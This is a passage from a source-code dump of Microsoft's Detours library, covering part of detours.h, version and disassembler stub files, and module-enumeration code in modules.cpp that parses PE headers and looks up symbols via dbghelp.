DETOUR_IA64_INSTRUCTIONS_PER_BUNDLE * DETOUR_IA64_INSTRUCTION_SIZE == 128); 886 | 887 | __declspec(align(16)) struct DETOUR_IA64_BUNDLE 888 | { 889 | public: 890 | union 891 | { 892 | BYTE data[16]; 893 | UINT64 wide[2]; 894 | }; 895 | 896 | enum { 897 | A_UNIT = 1u, 898 | I_UNIT = 2u, 899 | M_UNIT = 3u, 900 | B_UNIT = 4u, 901 | F_UNIT = 5u, 902 | L_UNIT = 6u, 903 | X_UNIT = 7u, 904 | }; 905 | struct DETOUR_IA64_METADATA 906 | { 907 | ULONG nTemplate : 8; // Instruction template. 908 | ULONG nUnit0 : 4; // Unit for slot 0 909 | ULONG nUnit1 : 4; // Unit for slot 1 910 | ULONG nUnit2 : 4; // Unit for slot 2 911 | }; 912 | 913 | protected: 914 | static const DETOUR_IA64_METADATA s_rceCopyTable[33]; 915 | 916 | UINT RelocateBundle(_Inout_ DETOUR_IA64_BUNDLE* pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const; 917 | 918 | bool RelocateInstruction(_Inout_ DETOUR_IA64_BUNDLE* pDst, 919 | _In_ BYTE slot, 920 | _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra) const; 921 | 922 | // 120 112 104 96 88 80 72 64 56 48 40 32 24 16 8 0 923 | // f. e. d. c. b. a. 9. 8. 7. 6. 5. 4. 3. 2. 1. 0. 924 | 925 | // 00 926 | // f.e. d.c. b.a. 9.8. 7.6. 5.4. 3.2. 1.0. 927 | // 0000 0000 0000 0000 0000 0000 0000 001f : Template [4..0] 928 | // 0000 0000 0000 0000 0000 03ff ffff ffe0 : Zero [ 41.. 5] 929 | // 0000 0000 0000 0000 0000 3c00 0000 0000 : Zero [ 45.. 42] 930 | // 0000 0000 0007 ffff ffff c000 0000 0000 : One [ 82.. 46] 931 | // 0000 0000 0078 0000 0000 0000 0000 0000 : One [ 86.. 83] 932 | // 0fff ffff ff80 0000 0000 0000 0000 0000 : Two [123.. 87] 933 | // f000 0000 0000 0000 0000 0000 0000 0000 : Two [127..124] 934 | BYTE GetTemplate() const; 935 | // Get 4 bit opcodes. 936 | BYTE GetInst0() const; 937 | BYTE GetInst1() const; 938 | BYTE GetInst2() const; 939 | BYTE GetUnit(BYTE slot) const; 940 | BYTE GetUnit0() const; 941 | BYTE GetUnit1() const; 942 | BYTE GetUnit2() const; 943 | // Get 37 bit data. 944 | UINT64 GetData0() const; 945 | UINT64 GetData1() const; 946 | UINT64 GetData2() const; 947 | 948 | // Get/set the full 41 bit instructions. 949 | UINT64 GetInstruction(BYTE slot) const; 950 | UINT64 GetInstruction0() const; 951 | UINT64 GetInstruction1() const; 952 | UINT64 GetInstruction2() const; 953 | void SetInstruction(BYTE slot, UINT64 instruction); 954 | void SetInstruction0(UINT64 instruction); 955 | void SetInstruction1(UINT64 instruction); 956 | void SetInstruction2(UINT64 instruction); 957 | 958 | // Get/set bitfields. 959 | static UINT64 GetBits(UINT64 Value, UINT64 Offset, UINT64 Count); 960 | static UINT64 SetBits(UINT64 Value, UINT64 Offset, UINT64 Count, UINT64 Field); 961 | 962 | // Get specific read-only fields. 963 | static UINT64 GetOpcode(UINT64 instruction); // 4bit opcode 964 | static UINT64 GetX(UINT64 instruction); // 1bit opcode extension 965 | static UINT64 GetX3(UINT64 instruction); // 3bit opcode extension 966 | static UINT64 GetX6(UINT64 instruction); // 6bit opcode extension 967 | 968 | // Get/set specific fields. 969 | static UINT64 GetImm7a(UINT64 instruction); 970 | static UINT64 SetImm7a(UINT64 instruction, UINT64 imm7a); 971 | static UINT64 GetImm13c(UINT64 instruction); 972 | static UINT64 SetImm13c(UINT64 instruction, UINT64 imm13c); 973 | static UINT64 GetSignBit(UINT64 instruction); 974 | static UINT64 SetSignBit(UINT64 instruction, UINT64 signBit); 975 | static UINT64 GetImm20a(UINT64 instruction); 976 | static UINT64 SetImm20a(UINT64 instruction, UINT64 imm20a); 977 | static UINT64 GetImm20b(UINT64 instruction); 978 | static UINT64 SetImm20b(UINT64 instruction, UINT64 imm20b); 979 | 980 | static UINT64 SignExtend(UINT64 Value, UINT64 Offset); 981 | 982 | BOOL IsMovlGp() const; 983 | 984 | VOID SetInst(BYTE Slot, BYTE nInst); 985 | VOID SetInst0(BYTE nInst); 986 | VOID SetInst1(BYTE nInst); 987 | VOID SetInst2(BYTE nInst); 988 | VOID SetData(BYTE Slot, UINT64 nData); 989 | VOID SetData0(UINT64 nData); 990 | VOID SetData1(UINT64 nData); 991 | VOID SetData2(UINT64 nData); 992 | BOOL SetNop(BYTE Slot); 993 | BOOL SetNop0(); 994 | BOOL SetNop1(); 995 | BOOL SetNop2(); 996 | 997 | public: 998 | BOOL IsBrl() const; 999 | VOID SetBrl(); 1000 | VOID SetBrl(UINT64 target); 1001 | UINT64 GetBrlTarget() const; 1002 | VOID SetBrlTarget(UINT64 target); 1003 | VOID SetBrlImm(UINT64 imm); 1004 | UINT64 GetBrlImm() const; 1005 | 1006 | UINT64 GetMovlGp() const; 1007 | VOID SetMovlGp(UINT64 gp); 1008 | 1009 | VOID SetStop(); 1010 | 1011 | UINT Copy(_Out_ DETOUR_IA64_BUNDLE *pDst, _Inout_opt_ DETOUR_IA64_BUNDLE* pBundleExtra = NULL) const; 1012 | }; 1013 | #endif // DETOURS_IA64 1014 | 1015 | #ifdef DETOURS_ARM 1016 | 1017 | #define DETOURS_PFUNC_TO_PBYTE(p) ((PBYTE)(((ULONG_PTR)(p)) & ~(ULONG_PTR)1)) 1018 | #define DETOURS_PBYTE_TO_PFUNC(p) ((PBYTE)(((ULONG_PTR)(p)) | (ULONG_PTR)1)) 1019 | 1020 | #endif // DETOURS_ARM 1021 | 1022 | ////////////////////////////////////////////////////////////////////////////// 1023 | 1024 | #ifdef __cplusplus 1025 | extern "C" { 1026 | #endif // __cplusplus 1027 | 1028 | #define DETOUR_OFFLINE_LIBRARY(x) \ 1029 | PVOID WINAPI DetourCopyInstruction##x(_In_opt_ PVOID pDst, \ 1030 | _Inout_opt_ PVOID *ppDstPool, \ 1031 | _In_ PVOID pSrc, \ 1032 | _Out_opt_ PVOID *ppTarget, \ 1033 | _Out_opt_ LONG *plExtra); \ 1034 | \ 1035 | BOOL WINAPI DetourSetCodeModule##x(_In_ HMODULE hModule, \ 1036 | _In_ BOOL fLimitReferencesToModule); \ 1037 | 1038 | DETOUR_OFFLINE_LIBRARY(X86) 1039 | DETOUR_OFFLINE_LIBRARY(X64) 1040 | DETOUR_OFFLINE_LIBRARY(ARM) 1041 | DETOUR_OFFLINE_LIBRARY(ARM64) 1042 | DETOUR_OFFLINE_LIBRARY(IA64) 1043 | 1044 | #undef DETOUR_OFFLINE_LIBRARY 1045 | 1046 | ////////////////////////////////////////////////////////////////////////////// 1047 | // 1048 | // Helpers for manipulating page protection. 1049 | // 1050 | 1051 | _Success_(return != FALSE) 1052 | BOOL WINAPI DetourVirtualProtectSameExecuteEx(_In_ HANDLE hProcess, 1053 | _In_ PVOID pAddress, 1054 | _In_ SIZE_T nSize, 1055 | _In_ DWORD dwNewProtect, 1056 | _Out_ PDWORD pdwOldProtect); 1057 | 1058 | _Success_(return != FALSE) 1059 | BOOL WINAPI DetourVirtualProtectSameExecute(_In_ PVOID pAddress, 1060 | _In_ SIZE_T nSize, 1061 | _In_ DWORD dwNewProtect, 1062 | _Out_ PDWORD pdwOldProtect); 1063 | #ifdef __cplusplus 1064 | } 1065 | #endif // __cplusplus 1066 | 1067 | ////////////////////////////////////////////////////////////////////////////// 1068 | 1069 | #define MM_ALLOCATION_GRANULARITY 0x10000 1070 | 1071 | ////////////////////////////////////////////////////////////////////////////// 1072 | 1073 | #endif // DETOURS_INTERNAL 1074 | #endif // __cplusplus 1075 | 1076 | #endif // _DETOURS_H_ 1077 | // 1078 | //////////////////////////////////////////////////////////////// End of File. 1079 | -------------------------------------------------------------------------------- /Detours-master/src/detver.h: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Common version parameters. 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #define _USING_V110_SDK71_ 1 11 | #include "winver.h" 12 | #if 0 13 | #include 14 | #include 15 | #else 16 | #ifndef DETOURS_STRINGIFY 17 | #define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x) 18 | #define DETOURS_STRINGIFY_(x) #x 19 | #endif 20 | 21 | #define VER_FILEFLAGSMASK 0x3fL 22 | #define VER_FILEFLAGS 0x0L 23 | #define VER_FILEOS 0x00040004L 24 | #define VER_FILETYPE 0x00000002L 25 | #define VER_FILESUBTYPE 0x00000000L 26 | #endif 27 | #define VER_DETOURS_BITS DETOUR_STRINGIFY(DETOURS_BITS) 28 | -------------------------------------------------------------------------------- /Detours-master/src/disolarm.cpp: -------------------------------------------------------------------------------- 1 | #define DETOURS_ARM_OFFLINE_LIBRARY 2 | #include "disasm.cpp" 3 | -------------------------------------------------------------------------------- /Detours-master/src/disolarm64.cpp: -------------------------------------------------------------------------------- 1 | #define DETOURS_ARM64_OFFLINE_LIBRARY 2 | #include "disasm.cpp" 3 | -------------------------------------------------------------------------------- /Detours-master/src/disolia64.cpp: -------------------------------------------------------------------------------- 1 | #define DETOURS_IA64_OFFLINE_LIBRARY 2 | #include "disasm.cpp" 3 | -------------------------------------------------------------------------------- /Detours-master/src/disolx64.cpp: -------------------------------------------------------------------------------- 1 | #define DETOURS_X64_OFFLINE_LIBRARY 2 | #include "disasm.cpp" 3 | -------------------------------------------------------------------------------- /Detours-master/src/disolx86.cpp: -------------------------------------------------------------------------------- 1 | #define DETOURS_X86_OFFLINE_LIBRARY 2 | #include "disasm.cpp" 3 | -------------------------------------------------------------------------------- /Detours-master/src/modules.cpp: -------------------------------------------------------------------------------- 1 | ////////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Module Enumeration Functions (modules.cpp of detours.lib) 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | // Module enumeration functions. 10 | // 11 | 12 | #define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1 13 | 14 | #pragma warning(disable:4068) // unknown pragma (suppress) 15 | 16 | #if _MSC_VER >= 1900 17 | #pragma warning(push) 18 | #pragma warning(disable:4091) // empty typedef 19 | #endif 20 | 21 | #define _ARM_WINAPI_PARTITION_DESKTOP_SDK_AVAILABLE 1 22 | #include 23 | #if (_MSC_VER < 1310) 24 | #else 25 | #pragma warning(push) 26 | #if _MSC_VER > 1400 27 | #pragma warning(disable:6102 6103) // /analyze warnings 28 | #endif 29 | #include 30 | #pragma warning(pop) 31 | #endif 32 | 33 | // #define DETOUR_DEBUG 1 34 | #define DETOURS_INTERNAL 35 | #include "detours.h" 36 | 37 | #if DETOURS_VERSION != 0x4c0c1 // 0xMAJORcMINORcPATCH 38 | #error detours.h version mismatch 39 | #endif 40 | 41 | #if _MSC_VER >= 1900 42 | #pragma warning(pop) 43 | #endif 44 | 45 | #define CLR_DIRECTORY OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] 46 | #define IAT_DIRECTORY OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT] 47 | 48 | ////////////////////////////////////////////////////////////////////////////// 49 | // 50 | const GUID DETOUR_EXE_RESTORE_GUID = { 51 | 0x2ed7a3ff, 0x3339, 0x4a8d, 52 | { 0x80, 0x5c, 0xd4, 0x98, 0x15, 0x3f, 0xc2, 0x8f }}; 53 | 54 | ////////////////////////////////////////////////////////////////////////////// 55 | // 56 | PDETOUR_SYM_INFO DetourLoadImageHlp(VOID) 57 | { 58 | static DETOUR_SYM_INFO symInfo; 59 | static PDETOUR_SYM_INFO pSymInfo = NULL; 60 | static BOOL failed = false; 61 | 62 | if (failed) { 63 | return NULL; 64 | } 65 | if (pSymInfo != NULL) { 66 | return pSymInfo; 67 | } 68 | 69 | ZeroMemory(&symInfo, sizeof(symInfo)); 70 | // Create a real handle to the process. 71 | #if 0 72 | DuplicateHandle(GetCurrentProcess(), 73 | GetCurrentProcess(), 74 | GetCurrentProcess(), 75 | &symInfo.hProcess, 76 | 0, 77 | FALSE, 78 | DUPLICATE_SAME_ACCESS); 79 | #else 80 | symInfo.hProcess = GetCurrentProcess(); 81 | #endif 82 | 83 | symInfo.hDbgHelp = LoadLibraryExW(L"dbghelp.dll", NULL, 0); 84 | if (symInfo.hDbgHelp == NULL) { 85 | abort: 86 | failed = true; 87 | if (symInfo.hDbgHelp != NULL) { 88 | FreeLibrary(symInfo.hDbgHelp); 89 | } 90 | symInfo.pfImagehlpApiVersionEx = NULL; 91 | symInfo.pfSymInitialize = NULL; 92 | symInfo.pfSymSetOptions = NULL; 93 | symInfo.pfSymGetOptions = NULL; 94 | symInfo.pfSymLoadModule64 = NULL; 95 | symInfo.pfSymGetModuleInfo64 = NULL; 96 | symInfo.pfSymFromName = NULL; 97 | return NULL; 98 | } 99 | 100 | symInfo.pfImagehlpApiVersionEx 101 | = (PF_ImagehlpApiVersionEx)GetProcAddress(symInfo.hDbgHelp, 102 | "ImagehlpApiVersionEx"); 103 | symInfo.pfSymInitialize 104 | = (PF_SymInitialize)GetProcAddress(symInfo.hDbgHelp, "SymInitialize"); 105 | symInfo.pfSymSetOptions 106 | = (PF_SymSetOptions)GetProcAddress(symInfo.hDbgHelp, "SymSetOptions"); 107 | symInfo.pfSymGetOptions 108 | = (PF_SymGetOptions)GetProcAddress(symInfo.hDbgHelp, "SymGetOptions"); 109 | symInfo.pfSymLoadModule64 110 | = (PF_SymLoadModule64)GetProcAddress(symInfo.hDbgHelp, "SymLoadModule64"); 111 | symInfo.pfSymGetModuleInfo64 112 | = (PF_SymGetModuleInfo64)GetProcAddress(symInfo.hDbgHelp, "SymGetModuleInfo64"); 113 | symInfo.pfSymFromName 114 | = (PF_SymFromName)GetProcAddress(symInfo.hDbgHelp, "SymFromName"); 115 | 116 | API_VERSION av; 117 | ZeroMemory(&av, sizeof(av)); 118 | av.MajorVersion = API_VERSION_NUMBER; 119 | 120 | if (symInfo.pfImagehlpApiVersionEx == NULL || 121 | symInfo.pfSymInitialize == NULL || 122 | symInfo.pfSymLoadModule64 == NULL || 123 | symInfo.pfSymGetModuleInfo64 == NULL || 124 | symInfo.pfSymFromName == NULL) { 125 | goto abort; 126 | } 127 | 128 | symInfo.pfImagehlpApiVersionEx(&av); 129 | if (av.MajorVersion < API_VERSION_NUMBER) { 130 | goto abort; 131 | } 132 | 133 | if (!symInfo.pfSymInitialize(symInfo.hProcess, NULL, FALSE)) { 134 | // We won't retry the initialize if it fails. 135 | goto abort; 136 | } 137 | 138 | if (symInfo.pfSymGetOptions != NULL && symInfo.pfSymSetOptions != NULL) { 139 | DWORD dw = symInfo.pfSymGetOptions(); 140 | 141 | dw &= ~(SYMOPT_CASE_INSENSITIVE | 142 | SYMOPT_UNDNAME | 143 | SYMOPT_DEFERRED_LOADS | 144 | 0); 145 | dw |= ( 146 | #if defined(SYMOPT_EXACT_SYMBOLS) 147 | SYMOPT_EXACT_SYMBOLS | 148 | #endif 149 | #if defined(SYMOPT_NO_UNQUALIFIED_LOADS) 150 | SYMOPT_NO_UNQUALIFIED_LOADS | 151 | #endif 152 | SYMOPT_DEFERRED_LOADS | 153 | #if defined(SYMOPT_FAIL_CRITICAL_ERRORS) 154 | SYMOPT_FAIL_CRITICAL_ERRORS | 155 | #endif 156 | #if defined(SYMOPT_INCLUDE_32BIT_MODULES) 157 | SYMOPT_INCLUDE_32BIT_MODULES | 158 | #endif 159 | 0); 160 | symInfo.pfSymSetOptions(dw); 161 | } 162 | 163 | pSymInfo = &symInfo; 164 | return pSymInfo; 165 | } 166 | 167 | PVOID WINAPI DetourFindFunction(_In_ PCSTR pszModule, 168 | _In_ PCSTR pszFunction) 169 | { 170 | /////////////////////////////////////////////// First, try GetProcAddress. 171 | // 172 | #pragma prefast(suppress:28752, "We don't do the unicode conversion for LoadLibraryExA.") 173 | HMODULE hModule = LoadLibraryExA(pszModule, NULL, 0); 174 | if (hModule == NULL) { 175 | return NULL; 176 | } 177 | 178 | PBYTE pbCode = (PBYTE)GetProcAddress(hModule, pszFunction); 179 | if (pbCode) { 180 | return pbCode; 181 | } 182 | 183 | ////////////////////////////////////////////////////// Then try ImageHelp. 184 | // 185 | DETOUR_TRACE(("DetourFindFunction(%hs, %hs)\n", pszModule, pszFunction)); 186 | PDETOUR_SYM_INFO pSymInfo = DetourLoadImageHlp(); 187 | if (pSymInfo == NULL) { 188 | DETOUR_TRACE(("DetourLoadImageHlp failed: %d\n", 189 | GetLastError())); 190 | return NULL; 191 | } 192 | 193 | if (pSymInfo->pfSymLoadModule64(pSymInfo->hProcess, NULL, 194 | (PCHAR)pszModule, NULL, 195 | (DWORD64)hModule, 0) == 0) { 196 | if (ERROR_SUCCESS != GetLastError()) { 197 | DETOUR_TRACE(("SymLoadModule64(%p) failed: %d\n", 198 | pSymInfo->hProcess, GetLastError())); 199 | return NULL; 200 | } 201 | } 202 | 203 | HRESULT hrRet; 204 | CHAR szFullName[512]; 205 | IMAGEHLP_MODULE64 modinfo; 206 | ZeroMemory(&modinfo, sizeof(modinfo)); 207 | modinfo.SizeOfStruct = sizeof(modinfo); 208 | if (!pSymInfo->pfSymGetModuleInfo64(pSymInfo->hProcess, (DWORD64)hModule, &modinfo)) { 209 | DETOUR_TRACE(("SymGetModuleInfo64(%p, %p) failed: %d\n", 210 | pSymInfo->hProcess, hModule, GetLastError())); 211 | return NULL; 212 | } 213 | 214 | hrRet = StringCchCopyA(szFullName, sizeof(szFullName)/sizeof(CHAR), modinfo.ModuleName); 215 | if (FAILED(hrRet)) { 216 | DETOUR_TRACE(("StringCchCopyA failed: %08x\n", hrRet)); 217 | return NULL; 218 | } 219 | hrRet = StringCchCatA(szFullName, sizeof(szFullName)/sizeof(CHAR), "!"); 220 | if (FAILED(hrRet)) { 221 | DETOUR_TRACE(("StringCchCatA failed: %08x\n", hrRet)); 222 | return NULL; 223 | } 224 | hrRet = StringCchCatA(szFullName, sizeof(szFullName)/sizeof(CHAR), pszFunction); 225 | if (FAILED(hrRet)) { 226 | DETOUR_TRACE(("StringCchCatA failed: %08x\n", hrRet)); 227 | return NULL; 228 | } 229 | 230 | struct CFullSymbol : SYMBOL_INFO { 231 | CHAR szRestOfName[512]; 232 | } symbol; 233 | ZeroMemory(&symbol, sizeof(symbol)); 234 | //symbol.ModBase = (ULONG64)hModule; 235 | symbol.SizeOfStruct = sizeof(SYMBOL_INFO); 236 | #ifdef DBHLPAPI 237 | symbol.MaxNameLen = sizeof(symbol.szRestOfName)/sizeof(symbol.szRestOfName[0]); 238 | #else 239 | symbol.MaxNameLength = sizeof(symbol.szRestOfName)/sizeof(symbol.szRestOfName[0]); 240 | #endif 241 | 242 | if (!pSymInfo->pfSymFromName(pSymInfo->hProcess, szFullName, &symbol)) { 243 | DETOUR_TRACE(("SymFromName(%hs) failed: %d\n", szFullName, GetLastError())); 244 | return NULL; 245 | } 246 | 247 | #if defined(DETOURS_IA64) 248 | // On the IA64, we get a raw code pointer from the symbol engine 249 | // and have to convert it to a wrapped [code pointer, global pointer]. 250 | // 251 | PPLABEL_DESCRIPTOR pldEntry = (PPLABEL_DESCRIPTOR)DetourGetEntryPoint(hModule); 252 | PPLABEL_DESCRIPTOR pldSymbol = new PLABEL_DESCRIPTOR; 253 | 254 | pldSymbol->EntryPoint = symbol.Address; 255 | pldSymbol->GlobalPointer = pldEntry->GlobalPointer; 256 | return (PBYTE)pldSymbol; 257 | #elif defined(DETOURS_ARM) 258 | // On the ARM, we get a raw code pointer, which we must convert into a 259 | // valied Thumb2 function pointer. 260 | return DETOURS_PBYTE_TO_PFUNC(symbol.Address); 261 | #else 262 | return (PBYTE)symbol.Address; 263 | #endif 264 | } 265 | 266 | //////////////////////////////////////////////////// Module Image Functions. 267 | // 268 | 269 | HMODULE WINAPI DetourEnumerateModules(_In_opt_ HMODULE hModuleLast) 270 | { 271 | PBYTE pbLast = (PBYTE)hModuleLast + MM_ALLOCATION_GRANULARITY; 272 | 273 | MEMORY_BASIC_INFORMATION mbi; 274 | ZeroMemory(&mbi, sizeof(mbi)); 275 | 276 | // Find the next memory region that contains a mapped PE image. 277 | // 278 | for (;; pbLast = (PBYTE)mbi.BaseAddress + mbi.RegionSize) { 279 | if (VirtualQuery(pbLast, &mbi, sizeof(mbi)) <= 0) { 280 | break; 281 | } 282 | 283 | // Skip uncommitted regions and guard pages. 284 | // 285 | if ((mbi.State != MEM_COMMIT) || 286 | ((mbi.Protect & 0xff) == PAGE_NOACCESS) || 287 | (mbi.Protect & PAGE_GUARD)) { 288 | continue; 289 | } 290 | 291 | __try { 292 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)pbLast; 293 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE || 294 | (DWORD)pDosHeader->e_lfanew > mbi.RegionSize || 295 | (DWORD)pDosHeader->e_lfanew < sizeof(*pDosHeader)) { 296 | continue; 297 | } 298 | 299 | PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + 300 | pDosHeader->e_lfanew); 301 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) { 302 | continue; 303 | } 304 | 305 | return (HMODULE)pDosHeader; 306 | } 307 | #pragma prefast(suppress:28940, "A bad pointer means this probably isn't a PE header.") 308 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 309 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 310 | continue; 311 | } 312 | } 313 | return NULL; 314 | } 315 | 316 | PVOID WINAPI DetourGetEntryPoint(_In_opt_ HMODULE hModule) 317 | { 318 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; 319 | if (hModule == NULL) { 320 | pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL); 321 | } 322 | 323 | __try { 324 | #pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL. 325 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 326 | SetLastError(ERROR_BAD_EXE_FORMAT); 327 | return NULL; 328 | } 329 | 330 | PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + 331 | pDosHeader->e_lfanew); 332 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) { 333 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 334 | return NULL; 335 | } 336 | if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) { 337 | SetLastError(ERROR_EXE_MARKED_INVALID); 338 | return NULL; 339 | } 340 | 341 | PDETOUR_CLR_HEADER pClrHeader = NULL; 342 | if (pNtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC) { 343 | if (((PIMAGE_NT_HEADERS32)pNtHeader)->CLR_DIRECTORY.VirtualAddress != 0 && 344 | ((PIMAGE_NT_HEADERS32)pNtHeader)->CLR_DIRECTORY.Size != 0) { 345 | pClrHeader = (PDETOUR_CLR_HEADER) 346 | (((PBYTE)pDosHeader) 347 | + ((PIMAGE_NT_HEADERS32)pNtHeader)->CLR_DIRECTORY.VirtualAddress); 348 | } 349 | } 350 | else if (pNtHeader->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) { 351 | if (((PIMAGE_NT_HEADERS64)pNtHeader)->CLR_DIRECTORY.VirtualAddress != 0 && 352 | ((PIMAGE_NT_HEADERS64)pNtHeader)->CLR_DIRECTORY.Size != 0) { 353 | pClrHeader = (PDETOUR_CLR_HEADER) 354 | (((PBYTE)pDosHeader) 355 | + ((PIMAGE_NT_HEADERS64)pNtHeader)->CLR_DIRECTORY.VirtualAddress); 356 | } 357 | } 358 | 359 | if (pClrHeader != NULL) { 360 | // For MSIL assemblies, we want to use the _Cor entry points. 361 | 362 | HMODULE hClr = GetModuleHandleW(L"MSCOREE.DLL"); 363 | if (hClr == NULL) { 364 | return NULL; 365 | } 366 | 367 | SetLastError(NO_ERROR); 368 | return GetProcAddress(hClr, "_CorExeMain"); 369 | } 370 | 371 | SetLastError(NO_ERROR); 372 | 373 | // Pure resource DLLs have neither an entry point nor CLR information 374 | // so handle them by returning NULL (LastError is NO_ERROR) 375 | if (pNtHeader->OptionalHeader.AddressOfEntryPoint == 0) { 376 | return NULL; 377 | } 378 | 379 | return ((PBYTE)pDosHeader) + 380 | pNtHeader->OptionalHeader.AddressOfEntryPoint; 381 | } 382 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 383 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 384 | SetLastError(ERROR_EXE_MARKED_INVALID); 385 | return NULL; 386 | } 387 | } 388 | 389 | ULONG WINAPI DetourGetModuleSize(_In_opt_ HMODULE hModule) 390 | { 391 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; 392 | if (hModule == NULL) { 393 | pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL); 394 | } 395 | 396 | __try { 397 | #pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL. 398 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 399 | SetLastError(ERROR_BAD_EXE_FORMAT); 400 | return NULL; 401 | } 402 | 403 | PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + 404 | pDosHeader->e_lfanew); 405 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) { 406 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 407 | return NULL; 408 | } 409 | if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) { 410 | SetLastError(ERROR_EXE_MARKED_INVALID); 411 | return NULL; 412 | } 413 | SetLastError(NO_ERROR); 414 | 415 | return (pNtHeader->OptionalHeader.SizeOfImage); 416 | } 417 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 418 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 419 | SetLastError(ERROR_EXE_MARKED_INVALID); 420 | return NULL; 421 | } 422 | } 423 | 424 | HMODULE WINAPI DetourGetContainingModule(_In_ PVOID pvAddr) 425 | { 426 | MEMORY_BASIC_INFORMATION mbi; 427 | ZeroMemory(&mbi, sizeof(mbi)); 428 | 429 | __try { 430 | if (VirtualQuery(pvAddr, &mbi, sizeof(mbi)) <= 0) { 431 | SetLastError(ERROR_BAD_EXE_FORMAT); 432 | return NULL; 433 | } 434 | 435 | // Skip uncommitted regions and guard pages. 436 | // 437 | if ((mbi.State != MEM_COMMIT) || 438 | ((mbi.Protect & 0xff) == PAGE_NOACCESS) || 439 | (mbi.Protect & PAGE_GUARD)) { 440 | SetLastError(ERROR_BAD_EXE_FORMAT); 441 | return NULL; 442 | } 443 | 444 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)mbi.AllocationBase; 445 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 446 | SetLastError(ERROR_BAD_EXE_FORMAT); 447 | return NULL; 448 | } 449 | 450 | PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + 451 | pDosHeader->e_lfanew); 452 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) { 453 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 454 | return NULL; 455 | } 456 | if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) { 457 | SetLastError(ERROR_EXE_MARKED_INVALID); 458 | return NULL; 459 | } 460 | SetLastError(NO_ERROR); 461 | 462 | return (HMODULE)pDosHeader; 463 | } 464 | __except(GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION ? 465 | EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH) { 466 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 467 | return NULL; 468 | } 469 | } 470 | 471 | 472 | static inline PBYTE RvaAdjust(_Pre_notnull_ PIMAGE_DOS_HEADER pDosHeader, _In_ DWORD raddr) 473 | { 474 | if (raddr != NULL) { 475 | return ((PBYTE)pDosHeader) + raddr; 476 | } 477 | return NULL; 478 | } 479 | 480 | BOOL WINAPI DetourEnumerateExports(_In_ HMODULE hModule, 481 | _In_opt_ PVOID pContext, 482 | _In_ PF_DETOUR_ENUMERATE_EXPORT_CALLBACK pfExport) 483 | { 484 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; 485 | if (hModule == NULL) { 486 | pDosHeader = (PIMAGE_DOS_HEADER)GetModuleHandleW(NULL); 487 | } 488 | 489 | __try { 490 | #pragma warning(suppress:6011) // GetModuleHandleW(NULL) never returns NULL. 491 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) { 492 | SetLastError(ERROR_BAD_EXE_FORMAT); 493 | return NULL; 494 | } 495 | 496 | PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)((PBYTE)pDosHeader + 497 | pDosHeader->e_lfanew); 498 | if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) { 499 | SetLastError(ERROR_INVALID_EXE_SIGNATURE); 500 | return FALSE; 501 | } 502 | if (pNtHeader->FileHeader.SizeOfOptionalHeader == 0) { 503 | SetLastError(ERROR_EXE_MARKED_INVALID); 504 | return FALSE; 505 | } 506 | 507 | PIMAGE_EXPORT_DIRECTORY 